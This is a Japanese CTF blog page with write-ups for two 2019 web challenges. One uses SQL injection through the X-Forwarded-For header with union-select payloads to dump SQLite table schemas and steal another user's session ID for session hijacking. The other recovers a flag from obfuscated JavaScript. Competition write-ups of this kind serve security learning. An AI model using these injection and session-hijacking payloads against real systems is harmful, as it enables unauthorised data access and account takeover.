CTF日本語サイト

Security

2019年02月11日01:56

Quals: Saudi and Oman National Cyber Security CTF writeup Maria

カテゴリ
Quals: Saudi and Oman National Cyber Security CTF

Quals: Saudi and Oman National Cyber Security CTF 2019 » Maria

Category:Web Security
Level:hard
Points:200

Points

Maria is the only person who can view the flag

 Link:http://35.222.174.178/maria/

URLにアクセスします。Cookieを削除した状態でアクセスすると次のようにResponseにSQL文が記載されています。

1

X-Forwarded-ForタグでIPアドレスを指定してみます。
X-Forwarded-Forとは、HTTPヘッダフィールドの1つであり、ロードバランサなどの機器を経由してWebサーバに接続するクライアントの送信元IPアドレスを特定する際のデファクトスタンダードです。
Fiddlerでリクエストを編集して送信します。

2

X-Forwarded-Forで指定したIPアドレスがSQL文に反映されています。それではSQLインジェクションができないか調べてみます。
X-Forwarded-Forに「' union select 1--」を指定してみます。
3
エラーメッセージが返ってきました。SQLインジェクションができそうです。
union select の列数を4まで増やすとエラーが発生せず正常な応答になります。またそのときPHPSESSIDに4が設定されていますので、4つ目の列に取得したい情報を指定することで情報を得ることができそうです。
X-Forwarded-Forに次のSQL文を指定してみます。
' union select 1, 2, 3, group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
2つのテーブル名が取得できました。
PHPSESSID=nxf8_users%2Cnxf8_sessions;
それでは、nxf8_usersテーブルの列名を取得したいと思います。以下のSQL文を指定します。
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_users'--
次のようにCREATE TABLE文を取得できました。
PHPSESSID=CREATE+TABLE+%22nxf8_users%22+%28%0A++++++++++++%22id%22+int%2810%29+NOT+NULL%2C%0A++++++++++++%22name%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22email%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22password%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22role%22+varchar%28100%29++DEFAULT+NULL%0A++++++++%29;
パーセントエンコードを復号すると次のようになります。
CREATE TABLE "nxf8_users" (
    "id" int(10) NOT NULL,
    "name" varchar(255)  NOT NULL,
    "email" varchar(255)  NOT NULL,
    "password" varchar(255)  NOT NULL,
    "role" varchar(100)  DEFAULT NULL
);
同様にnxf8_sessionsテーブルのCREATE TABLE文を取得します。
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_sessions'--
以下の情報が取得できます。
CREATE TABLE "nxf8_sessions" (
    "id" int(10) NOT NULL,
    "user_id" varchar(255)  NOT NULL,
    "ip_address" varchar(255) NOT NULL,
    "session_id" varchar(255)  NOT NULL
); 
nxf8_usersテーブルから"Maria"の情報を取得します。
' union select 1, 2, 3, id FROM nxf8_users where name = 'Maria'--
次の情報が取得できます。MariaのIDは5です。
PHPSESSID=5;
nxf8_sessionsテーブルからuser_id=5の情報を取得します。
' union select 1, 2, 3, session_id FROM nxf8_sessions where user_id = '5'--
次の情報が取得できます。
PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
それではリクエストのクッキーに次の値を設定して要求を投げてみます。
Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
下図のようにフラグが表示されました。
4

フラグは、
aj9dhAdf4
です。

実践 Fiddler
実践 Fiddler [大型本]
Eric Lawrence
オライリージャパン
2013-05-25


タグ :
#Web
#Security
このエントリーをはてなブックマークに追加
2019年02月10日06:00

Quals: Saudi and Oman National Cyber Security CTF writeup Back to basics

カテゴリ
Quals: Saudi and Oman National Cyber Security CTF

Quals: Saudi and Oman National Cyber Security CTF 2019 » Back to basics 

Category:Web Security
Level:easy
Points:50

Points

not pretty much many options. No need to open a link from a browser, there is always a different way

 Link:http://35.197.254.240/backtobasics

URLにアクセスするとGoogleにリダイレクトされます。そこでFiddlerでRequestを編集してPOSTでRequestを投げてみます。すると次のようなResponseが返ってきます。
<!--
var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])
-->
次のようにコードを編集しブラウザで実行します。
<script>
<!--
var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];
function reverse(_0xa6e5x2)
{
flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])
}
console[_0x7f88[4]]= reverse;
console[_0x7f88[4]](_0x7f88[5])
-->
</script>
function内のflagの直後にブレークポイントを設定すると、flagの値が確認できます。

1

フラグは、
2b323f9008ed771765cd2259d860baec
タグ :
#Web
#Security
このエントリーをはてなブックマークに追加
記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
タグクラウド
最新記事
Incognito 4.0 Meow
DiceCTF 2023 recursive-csp
DiceCTF 2023 Provably Secure
Insomni'hack teaser 2023 Welcome
Real World CTF 5th 0KPR00F
idekCTF 2022 Typop
ASIS CTF Finals 2022 Vindica
TetCTF 2023 Image Services Viewer
TetCTF 2023 shuffle128
TetCTF 2023 NewYearBot
カテゴリー
ASIS CTF Quals 2014 (2)
WhiteHat Contest 10 (1)
HITCON CTF 2015 Quals (1)
Hackover CTF 2015 (2)
RCTF 2015 Quals (3)
Hack Dat Kiwi 2015 (3)
SECCON 2015 Online CTF (6)
9447 Security Society CTF 2015 (2)
Defcamp CTF Qualification 2015 (2)
32C3 CTF (1)
Trend Micro CTF Asia Pacific & Japan 2015 Online Qualifier (4)
CSAW CTF Qualification Round 2015 (3)
Insomni'hack teaser 2016 (2)
Break In 2016 (3)
HackIM 2016 (3)
Sharif University CTF 2016 (8)
Internetwache CTF 2016 (10)
SSCTF 2016 Quals (2)
Boston Key Party CTF 2016 (2)
0CTF 2016 Quals (1)
Sunshine CTF 2016 (2)
Codegate CTF 2016 Quals (2)
BCTF 2016 (3)
VolgaCTF 2016 Quals (1)
Pwn2Win CTF 2016 (4)
Securinets CTF Quals 2016 (2)
Nuit du Hack CTF Quals 2016 (4)
sCTF 2016 Q1 (8)
PlaidCTF 2016 (5)
Google Capture The Flag 2016 (6)
ASIS CTF Quals 2016 (2)
TU CTF 2016 (9)
DEF CON CTF Qualifier 2016 (2)
ALICTF 2016 (1)
BackdoorCTF 2016 (3)
IceCTF 2016 (1)
CSAW CTF Qualification Round 2016 (4)
HITCON CTF 2016 Quals (4)
EKOPARTY CTF 2016 (5)
Hack The Vote 2016 (5)
SharifCTF 7 (2)
BSides San Francisco CTF (9)
Securinets CTF Quals 2017 (2)
Teaser CONFidence CTF 2017 (1)
Insigne CTF (2)
PlaidCTF 2017 (4)
angstromCTF 2017 (2)
DEF CON CTF Qualifier 2017 (1)
CTFZone 2017 (2)
SHA2017 CTF (3)
HackIT CTF 2017 (1)
EKOPARTY CTF 2017 (1)
CSAW CTF Qualification Round 2017 (1)
Hack Dat Kiwi 2017 (1)
Pwn2Win CTF 2017 (3)
RC3 CTF 2017 (1)
WhiteHat Grand Prix 2017 (2)
InCTF (4)
34C3 CTF (2)
Break In CTF 2018 (2)
Harekaze CTF 2018 (1)
Pragyan CTF 2018 (4)
STEM CTF: Cyber Challenge 2018 (6)
*ctf 2018 (1)
NoNameCon CTF Quals 2018 (1)
ASIS CTF Quals 2018 (6)
PlaidCTF 2018 (1)
35C3 CTF (1)
FireShell CTF 2019 (4)
Evlz CTF (1)
Quals: Saudi and Oman National Cyber Security CTF (7)
STEM CTF: Cyber Challenge 2019 (3)
TAMUctf 19 (20)
BSidesSF 2019 CTF (2)
Aero CTF 2019 (4)
Pragyan CTF 2019 (4)
UTCTF (4)
Teaser CONFidence CTF 2019 (3)
0CTF/TCTF 2019 Quals (1)
Securinets CTF Quals 2019 (4)
b00t2root '19 (2)
VolgaCTF 2019 Qualifier (1)
RADARCTF (4)
Midnight Sun CTF 2019 Quals (2)
AceBear Security Contest 2019 (2)
SpamAndFlags Teaser 2019 (1)
SwampCTF 2019 (5)
CBM CTF 2019 (3)
Byte Bandits CTF 2019 (2)
PlaidCTF 2019 (1)
Hack Zone Tunisia 2019 (3)
YauzaCTF 2019 Quals (1)
TG:Hack (6)
ASIS CTF Quals 2019 (2)
ångstromCTF 2019 (9)
UUT CTF (8)
*CTF 2019 (1)
TetCTF 2023 (4)
ASIS CTF Finals 2022 (1)
Real World CTF 5th (1)
idekCTF 2022 (1)
Insomni'hack teaser 2023 (1)
DiceCTF 2023 (2)
Incognito 4.0 (1)